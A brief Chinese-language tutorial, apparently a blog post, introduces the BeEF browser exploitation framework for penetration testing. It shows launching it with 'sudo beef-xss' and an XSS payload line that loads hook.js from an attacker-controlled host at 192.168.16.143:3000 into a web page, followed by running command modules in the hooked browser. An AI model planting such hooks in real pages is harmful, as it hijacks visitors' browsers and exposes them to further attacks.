1.介绍

随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性:Web浏览器。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,并从浏览器上下文中对系统进行进一步攻击

2.运行

  1. sudo beef-xss

image.png
这里可以直接使用浏览器访问
image.png

3.利用

我们只需要插入这个xsspayload 插入到网页中

  1. <script src="http://192.168.16.143:3000/hook.js"></script>

image.png
image.png
可以在conmands 选项卡中选择payload 进行利用
image.png
点击执行,可以在页面上看到执行的效果